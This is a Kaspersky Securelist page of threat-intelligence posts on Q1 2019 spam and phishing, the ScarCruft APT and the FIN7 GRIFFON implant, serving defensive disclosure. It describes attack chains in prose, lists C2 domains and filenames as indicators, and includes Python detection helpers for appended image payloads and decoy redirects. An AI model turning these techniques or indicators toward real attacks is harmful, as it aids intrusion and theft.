Kaspersky Securelist


Spam and phishing in Q1 2019

15 May 2019 - 12:00

Quarterly highlights

Valentine’s Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.

New Apple products

Late March saw the unveiling of Apple’s latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.


Growth in the number of attempts to redirect users to phishing Apple sites before the presentation

Fake Apple ID login pages

Scammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.

Fake “Kaspersky Lab support service” accounts

All the profiles of this kind that we detected in Q1 have one thing in common: they offer assistance with the products of one company or another, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.

New Instagram “features”

Last year, we wrote that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full — not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.

As usual in such schemes, the “buyer” is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.

Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

“Dream job” offers from spammers

In Q3, we registered spam messages containing “dream job” offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the “cloud service,” the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim’s machine.

Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of “sextortion” — a topic we wrote about last year.

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim’s details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “employee” happened to know that the victim was a well-off individual with a reputation to protect — for which a payment of 10,000 dollars in bitcoin was demanded.

Playing on people’s fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.

Malicious attacks on the corporate sector

In Q1, the corporate sector of the Runet was hit by a malicious spam attack. The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

We also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender’s address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message — for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

Statistics: spam

Proportion of spam in mail traffic


Proportion of spam in global mail traffic, Q4 2018 – Q1 2019

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.


Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

Sources of spam by country


Sources of spam by country, Q1 2019

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).

Spam email size


Spam email size, Q4 2018 – Q1 2019

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

Malicious attachments: malware families


TOP 10 malicious families in mail traffic, Q1 2019

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

Countries targeted by malicious mailshots


Countries targeted by malicious mailshots, Q1 2019

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented 111,832,308 attempts to direct users to scam websites. 12.11% of all Kaspersky Lab users worldwide experienced an attack.

Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.


Geography of phishing attacks, Q1 2019

In second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.

Country   | %*
----------|------
Brazil    | 21.66
Australia | 17.20
Spain     | 16.96
Portugal  | 16.81
Venezuela | 16.72
Greece    | 15.86
Albania   | 15.11
Ecuador   | 14.99
Rwanda    | 14.89
Georgia   | 14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

This quarter, the banking sector remains in first place by number of attacks — the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.


Distribution of organizations subjected to phishing attacks by category, Q1 2019

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).

Conclusion

In Q1 2019, the average share of spam in global mail traffic rose by 0.06 p.p. to 55.97%, and the Anti-Phishing system prevented more than 111,832,308 redirects to phishing sites, up 35,220,650 in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

ScarCruft continues to evolve, introduces Bluetooth harvester

13 May 2019 - 12:00

Executive summary

After publishing our initial series of blogposts back in 2016, we have continued to track the ScarCruft threat actor. ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula. The threat actor is highly skilled and, by all appearances, quite resourceful.

We recently discovered some interesting telemetry on this actor, and decided to dig deeper into ScarCruft’s recent activity. This shows that the actor is still very active and constantly refining its attack tools. Based on our telemetry, we can reconstruct ScarCruft’s binary infection procedure. It used a multi-stage binary infection to update each module effectively and evade detection. In addition, we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel.

Multi-stage binary infection

The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises (SWC). As in Operation Daybreak, this actor performs sophisticated attacks using a zero-day exploit. However, sometimes using public exploit code is quicker and more effective for malware authors. We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign.

In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. This malware uses the public privilege escalation exploit code for CVE-2018-8120 or UACME, a tool normally used by legitimate red teams. Afterwards, the installer malware creates a downloader and a configuration file from its resources and executes the downloader. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network-level detection, the downloader uses steganography: the downloaded payload is an image file, but it carries an appended malicious payload that is decrypted on the host.
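The downloader described above fetches an image file with the real payload appended to it. The following triage check, an added example that is neither ScarCruft’s code nor Kaspersky’s tooling, parses a JPEG or PNG by its own structure and reports how many bytes follow the image’s end marker; the sample image files are constructed inline.

```python
"""Flag image files that carry data appended after the image's own end marker.

Added example (not from the report): parse the image structure, find where the
image really ends, and return whatever follows. A plain search for the JPEG
EOI bytes is not enough, because EXIF thumbnails embed a second JPEG.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the EOI marker (FF D9) of a JPEG.

    Segments before the first SOS are skipped by their declared length, so a
    thumbnail inside APP1 cannot be mistaken for the end of the file.
    """
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while True:
        if pos + 2 > len(data) or data[pos] != 0xFF:
            raise ValueError("truncated or malformed segment table")
        marker = data[pos + 1]
        if marker == 0xD9:
            return pos + 2  # EOI before any scan: degenerate but well formed
        if pos + 4 > len(data):
            raise ValueError("segment length missing")
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len
        if marker == 0xDA:  # SOS: entropy-coded data starts here
            break
    # In entropy-coded data an FF byte is always followed by 00 (byte stuffing)
    # or by an RSTn marker (D0-D7), so the first FF D9 after SOS is the real EOI.
    eoi = data.find(b"\xff\xd9", pos)
    if eoi < 0:
        raise ValueError("no EOI marker after scan data")
    return eoi + 2


def png_end_offset(data: bytes) -> int:
    """Offset just past the IEND chunk (its 4-byte CRC included) of a PNG."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG (bad signature)")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4  # header + data + CRC
        if chunk_end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        if ctype == b"IEND":
            return chunk_end
        pos = chunk_end
    raise ValueError("no IEND chunk")


def trailing_bytes(data: bytes) -> tuple:
    """Return (format, appended bytes); b'' means the file ends where the image does."""
    if data.startswith(b"\xff\xd8"):
        return "jpeg", data[jpeg_end_offset(data):]
    if data.startswith(PNG_SIG):
        return "png", data[png_end_offset(data):]
    raise ValueError("unsupported or non-image file")


# --- constructed sample files (hypothetical, for demonstration only) ---------

def _jpeg_segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg(trailer: bytes = b"") -> bytes:
    """Minimal JPEG: APP0, an APP1 holding a decoy thumbnail that itself ends in
    FF D9, one SOS with stuffed FF 00 bytes and an RST0 marker, then EOI."""
    app0 = _jpeg_segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    app1 = _jpeg_segment(0xE1, b"Exif\x00\x00" + b"\xff\xd8\xff\xd9")
    sos = _jpeg_segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"
    return b"\xff\xd8" + app0 + app1 + sos + scan + b"\xff\xd9" + trailer


def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png(trailer: bytes = b"") -> bytes:
    """1x1 8-bit grayscale PNG followed by an optional trailer."""
    ihdr = _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = _png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
    return PNG_SIG + ihdr + idat + _png_chunk(b"IEND", b"") + trailer


if __name__ == "__main__":
    for name, blob in [("clean.jpg", build_sample_jpeg()),
                       ("stage.jpg", build_sample_jpeg(b"X" * 2048)),
                       ("stage.png", build_sample_png(b"\x00" * 512))]:
        fmt, extra = trailing_bytes(blob)
        print(f"{name}: {fmt}, {len(extra)} trailing bytes")
```

A non-empty trailer is only a lead: some legitimate tools append metadata, so the flagged bytes still need to be examined (entropy, known headers) before the file is treated as a staged payload.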

Multi-stage binary infection

The final payload created by the aforementioned process is a well-known backdoor, also known as ROKRAT by Cisco Talos. This cloud service-based backdoor contains many features. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses each of them for a specially designated purpose. The malware creates 11 threads simultaneously: six threads are responsible for stealing information from the infected host, and five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service, it uses predefined directory paths such as /english, /video or /scriptout.

Cloud-based backdoor

The same malware contains full-featured backdoor functionality. The commands are downloaded from the /script path of a cloud service provider and the respective execution results are uploaded to the /scriptout path. It supports the following commands, which are enough to fully control the infected host:

  • Get File/Process listing
  • Download additional payload and execute
  • Execute Windows command
  • Update configuration data including cloud service token information
  • Save screenshot and an audio recording

The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration. During our research, we confirmed that they have an interest in mobile devices.

We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information.

  • Instance Name: Name of the device
  • Address: Address of the device
  • Class: Class of the device
  • Connected: Whether the device is connected (true or false)
  • Authenticated: Whether the device is authenticated (true or false)
  • Remembered: Whether the device is a remembered device (true or false)

The attackers appear to be increasing the scope of the information collected from victims.

Build path of Bluetooth information harvester

Victimology

We have found several victims of this campaign, based on our telemetry – investment and trading companies in Vietnam and Russia. We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea. It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.

Victimology of this campaign

Overlap with other actors

We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past. The fact that this victim visits North Korea makes it special and suggests that it may have valuable information about North Korean affairs. ScarCruft infected this victim on September 21, 2018. Before the ScarCruft infection, however, another APT group had also targeted this victim, with the host being infected with GreezeBackdoor on March 26, 2018.

GreezeBackdoor is a tool of the DarkHotel APT group, which we have previously written about. In addition, this victim was also attacked by the Konni malware on 03 April 2018. The Konni malware was disguised as a North Korean news item in a weaponized document (the name of the document was “Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip”).

Infection timeline

This is not the first time we have seen an overlap of the ScarCruft and DarkHotel actors. Members of our team have already presented on the conflict between these two threat actors at security conferences. We have also shared more details with our threat intelligence customers in the past. They are both Korean-speaking threat actors and sometimes their victimology overlaps. But both groups seem to have different TTPs (Tactics, Techniques and Procedures), which leads us to believe that one group regularly lurks in the other’s shadow.

Conclusions

ScarCruft has shown itself to be a highly skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve. For more information please contact: intelreports@kaspersky.com

Appendix I – Indicators of Compromise

File hashes (malicious documents, Trojans, emails, decoys)


The 2019 DBIR is out

8 May 2019 - 22:23

Once again, we are happy to support a large, voluntary, collaborative effort like the 2019 Data Breach Investigations Report. While our data contribution is completely anonymous, it is based on some of the 2018 data set that our private report customers receive from our efforts to protect all of our customers against every type of malware threat regardless of its source.

In general, the report is an excellent point of reference because it is sourced from so many organizations handling various incidents. This year, the Public Administration sector tops the list by far in terms of reported incidents and data along with the Information sector. “Cyber-Espionage is rampant in the Public sector, with State-affiliated actors accounting for 79 percent of all breaches involving external actors” and “Web applications are targeted with availability attacks as well as leveraged for access to cloud-based organizational email accounts.” Small businesses made up 43% of the reported DBIR breach victims in 2018.

“Use 2FA” is a common refrain throughout the report, along with “squish the phish”. Both two-factor authentication and phishing awareness, training, and handling can go a long way toward improving security in all organizations.

Enjoy another fine read this year!

FIN7.5: the infamous cybercrime rig “FIN7” continues its activities

8 May 2019 - 12:00

On August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts that have targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or to get access to financial data or the computers of finance department employees in order to conduct wire transfers to offshore accounts.

In 2018-2019, researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics, Techniques and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.

Recent FIN7 campaigns

The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.

Malicious Documents

We have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim’s computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as “12345”, “1234”, etc., uses macros to execute a GRIFFON implant on the target’s computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.

Interestingly, following some open-source publications about them, the FIN7 operators seem to have developed a homemade builder of malicious Office documents using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows the operators to modify different IOCs, such as the filenames of the wscript.exe or sctasks.exe copies, etc.

wscript.exe copy | sctasks copy | Task name   | C2
-----------------|--------------|-------------|--------------------
byzNne10.exe     | byzNne17.exe | TaskbyzNne  | logitech-cdn.com
c9FGG10.exe      | c9FGG17.exe  | Taskc9FGG   | logitech-cdn.com
zEsb10.exe       | zEsb17.exe   | TaskzEsb    | servicebing-cdn.com

IOCs extracted from docs which use sctasks for GRIFFON persistence

Author      | Company     | wscript.exe copy | C2
------------|-------------|------------------|-----------------------
mogjxjtvte  | mogjxjtvte  | mswmex44.exe     | logitech-cdn[.]com
soxvremvge  | soxvremvge  | c9FGG10.exe      | logitech-cdn[.]com
gareljtjhvd | gareljtjhvd | zEsb10.exe       | servicebing-cdn[.]com

IOCs extracted from regular documents associated with GRIFFON

GRIFFON Implant

Griffon Malware attack pattern

The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.

Reconnaissance module

The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which are then sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of the workstation’s monitors and their resolutions.

Meterpreter downloader

The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet”. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (e.g. with a key of 0x50 or 0x51) piece of Meterpreter shellcode to execute.

Screenshot module

The third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at “%TMP%/image.png”, sent back to the attackers by the GRIFFON implant and then deleted.

Persistence module

The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method.

Thanks to its lightweight and modular architecture, the GRIFFON implant is the perfect validator. Even though we were able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolset for achieving their objectives on the victim’s workstation.

On the hunt for GRIFFON infrastructure

Attackers make mistakes, and FIN7 is no exception. A major error made by its operators allowed us to follow the command and control servers of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators configured fake HTTP 302 redirections to various Google services on their C2 servers.

  HTTP/1.1 302 Found
  Server: nginx
  Date: [retracted]
  Content-Type: text/html; charset=UTF-8
  Content-Length: 0
  Connection: keep-alive
  Location: https://cloud.google.com/cdn/

Returned headers for most of the GRIFFON C2 servers on port 443

This error allowed us to follow the infrastructure week by week, until an individual posted the heuristic for tracking their C2 on Twitter at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page to prevent this type of tracking of their infrastructure.
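As an added illustration of the tracking heuristic described above (example code written for this page, not Kaspersky's tooling), the following checks a raw port-443 response for every trait in the quoted header block. The sample responses and candidate hostnames are constructed; since the operators changed their landing page in January 2019, the fingerprint is useful for historical scan data rather than live hunting.

```python
"""Triage helper for the decoy HTTP 302 fingerprint quoted above.

Added example for this write-up, not Kaspersky code. It parses a raw HTTP
response and requires every trait in the quoted header block: 302 status,
nginx Server header, text/html content type, empty body, keep-alive and a
Location pointing at a Google service. All samples below are constructed.
"""
from typing import Dict, List, Tuple
from urllib.parse import urlsplit


def parse_response(raw: str) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP/1.x response into (status code, lower-cased header map)."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("not an HTTP response status line")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def _is_google_service(location: str) -> bool:
    """The post mentions redirects to various Google services, so accept any google.com host."""
    url = urlsplit(location)
    host = (url.hostname or "").lower()
    return url.scheme == "https" and (host == "google.com" or host.endswith(".google.com"))


def matches_griffon_decoy(raw: str) -> bool:
    """True only when all traits of the quoted decoy response are present.

    The check is deliberately strict: a plain redirect to Google with a body,
    or one served by something other than nginx, is not the pattern from the post.
    """
    try:
        status, h = parse_response(raw)
    except ValueError:
        return False
    return (
        status == 302
        and h.get("server", "").lower() == "nginx"
        and h.get("content-type", "").lower().startswith("text/html")
        and h.get("content-length") == "0"
        and h.get("connection", "").lower() == "keep-alive"
        and _is_google_service(h.get("location", ""))
    )


def triage(responses: Dict[str, str]) -> List[str]:
    """Return the hostnames whose port-443 response matches the decoy pattern."""
    return sorted(host for host, raw in responses.items() if matches_griffon_decoy(raw))


# Constructed samples (not real captures); the Date value is a placeholder, as in the post.
DECOY_SAMPLE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: nginx\r\n"
    "Date: [placeholder]\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Content-Length: 0\r\n"
    "Connection: keep-alive\r\n"
    "Location: https://cloud.google.com/cdn/\r\n"
    "\r\n"
)
# Ordinary site redirecting to its canonical host with a small HTML body.
BENIGN_SAMPLE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 70\r\n"
    "Connection: keep-alive\r\n"
    "Location: https://www.example.com/\r\n"
    "\r\n"
    "<html><body><a href='https://www.example.com/'>moved</a></body></html>"
)
# Near miss: redirects to Google, but from another server software and with a body.
NEAR_MISS_SAMPLE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 12\r\n"
    "Connection: close\r\n"
    "Location: https://www.google.com/\r\n"
    "\r\n"
    "redirecting\n"
)

SAMPLE_RESPONSES = {
    "candidate-a.example": DECOY_SAMPLE,
    "candidate-b.example": BENIGN_SAMPLE,
    "candidate-c.example": NEAR_MISS_SAMPLE,
}

if __name__ == "__main__":
    print(triage(SAMPLE_RESPONSES))  # ['candidate-a.example']
```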

Fake pentest company

During the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.

According to the website, that domain supposedly belongs to a legitimate security company “fully owned by the Russian Government” (sic) with offices in “Moscow, Saint Petersburg and Yekaterinburg”, but the address says the company is located in Trump Tower, in New York. Given FIN7’s previous use of false security companies, we decided to look deeper into this one.

As we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:

  • DKSec – www.dksec.com
  • OKIOK – www.okiok.com/services/tailored-solutions
  • MainNerve – www.mainnerve.com
  • Datics – www.datatics.com/cyber-security
  • Perspective Risk – www.perspectiverisk.com
  • Synack – https://www.synack.com/company
  • FireEye – https://www.fireeye.com/services/penetration-testing.html

This company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.

In addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.

Links to other intrusion sets

While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.

CobaltGoblin/EmpireMonkey

Over its history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants to target mainly banks, and developers of banking and money-processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire to gain a foothold on victims’ networks. After a successful penetration, it uses its own backdoors and CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.

FIN7’s latest campaigns targeted banks in Europe and Central America. This threat actor is suspected of stealing €13 million from Bank of Valletta, Malta earlier this year.

Example of malicious documents used from the end of 2018 to the beginning of 2019

A few interesting overlaps in recent FIN7 campaigns:

  • Both used macros to copy wscript.exe to another file whose name began with “ms” (mses.exe for FIN7, msutil.exe for EmpireMonkey).
  • Both executed a JScript file named “Errors” in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).
  • Both used DocuSign decoy documents with different macros. The macros popped the same “Document decryption error” message, even though the macro code remains entirely different.

We have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.

AveMaria

AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.

To deliver their malware, the cybercriminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting a known vulnerability such as CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. Interestingly, in some emails they ask targets to phone them if they have any questions, just as the FIN7 operators do.

Example of AveMaria spearphishing emails. The criminals suggest calling them.

During the investigation into FIN7, our threat-hunting systems found an interesting overlap between the infrastructure of FIN7 and AveMaria: two servers in the same IP range and autonomous system (AS14576) share a non-standard SSH port, 222. One of the servers is a GRIFFON C2, and the other an AveMaria C2.

Distribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.

CopyPaste

